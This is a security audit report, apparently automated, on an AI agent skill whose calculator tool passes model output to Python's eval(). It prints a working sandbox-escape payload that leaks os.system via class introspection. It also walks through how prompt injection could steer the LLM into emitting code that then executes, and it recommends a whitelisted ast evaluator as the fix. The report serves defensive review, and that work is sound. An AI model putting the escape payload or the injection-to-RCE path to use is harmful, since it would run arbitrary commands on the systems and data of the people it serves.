ai-agent-basics

Audit result: Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Insecure code execution via eval() in scripts/react_agent.py.
      • Evidence: File scripts/react_agent.py, Line 84: result = eval(tool_input["expression"], {"__builtins__": {}}, {}).
      • Risk: Python's eval() is fundamentally difficult to sandbox. Attackers can use introspection techniques (e.g., accessing __class__ attributes of basic types) to retrieve references to the os module or other dangerous built-ins, bypassing the provided restrictions to execute arbitrary system commands.
  • [REMOTE_CODE_EXECUTION] (HIGH): Indirect RCE through LLM tool calling.
      • Ingestion Point: User-provided query in scripts/react_agent.py enters the LLM context.
      • Capability Inventory: The calculator tool allows the LLM to execute Python code via eval().
      • Risk: An attacker can use prompt injection to trick the LLM into generating a malicious Python payload. Because the LLM's output is directly evaluated, this creates a path for remote code execution.
  • [EXTERNAL_DOWNLOADS] (LOW): Dependency on external libraries.
      • Evidence: SKILL.md and scripts/react_agent.py reference langgraph and langchain-anthropic.
      • Status: These are trusted libraries from known organizations, though not on the explicit whitelist. Usage is standard for the skill's purpose.
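The introspection bypass described in the COMMAND_EXECUTION finding can be shown concretely. The payload below is a well-known CPython escape (it assumes the os module is loaded somewhere in the process, which holds in any normal interpreter); despite the emptied __builtins__ it recovers a live reference to os.system without ever naming os:

```python
import os  # imported here only so we can verify what the payload leaks

# Walk from a tuple literal up to `object`, enumerate every loaded class,
# and pull `system` out of the module globals of os._wrap_close.__init__.
payload = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == '_wrap_close'][0].__init__.__globals__['system']"
)

# The exact "restricted" call flagged in the finding:
leaked = eval(payload, {"__builtins__": {}}, {})
print(leaked is os.system)  # → True: the sandbox handed back os.system
```

From here an attacker only has to append a call with a shell command, which is why empty-builtins eval() cannot be treated as a sandbox.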
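The indirect-RCE path in the REMOTE_CODE_EXECUTION finding can be sketched with the model stubbed out; fake_llm, run_agent, and the tool-call shape here are illustrative, not taken from the skill's code:

```python
def fake_llm(query: str) -> dict:
    # Stand-in for the real model: a prompt-injected LLM can be steered
    # into emitting an arbitrary "expression", so we simply echo the input.
    return {"tool": "calculator", "expression": query}

def run_agent(query: str) -> str:
    call = fake_llm(query)
    if call["tool"] == "calculator":
        # Same sink as the audited line: model output reaches eval() directly.
        return str(eval(call["expression"], {"__builtins__": {}}, {}))
    return ""

print(run_agent("2 + 2"))  # → 4
# A query carrying an introspection payload of the kind described in the
# finding would execute attacker-chosen Python instead of arithmetic.
```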
Recommendations
  • Replace the eval()-based calculator in scripts/react_agent.py with a restricted expression evaluator; eval() with a stripped __builtins__ cannot be reliably sandboxed.
  • Treat all LLM output as untrusted input: validate tool arguments against a strict schema before execution, and never route model-generated text into a code-execution sink.
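One way to act on the first recommendation, sketched under the assumption that the calculator only needs basic arithmetic: parse the expression with the ast module and evaluate a whitelist of node types, so anything outside arithmetic is rejected rather than executed (safe_eval and the operator table are illustrative names, not part of the skill):

```python
import ast
import operator

# Whitelisted arithmetic operations; every other AST node is rejected.
_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv,
    ast.Pow: operator.pow, ast.USub: operator.neg,
}

def safe_eval(expr: str) -> float:
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed expression: {ast.dump(node)}")
    return walk(ast.parse(expr, mode="eval"))

print(safe_eval("2 * (3 + 4)"))  # → 14
```

Unlike eval(), this walk has no path to attribute access, names, or calls, so introspection payloads fail at parse-to-whitelist time instead of executing.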
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 17, 2026, 08:11 AM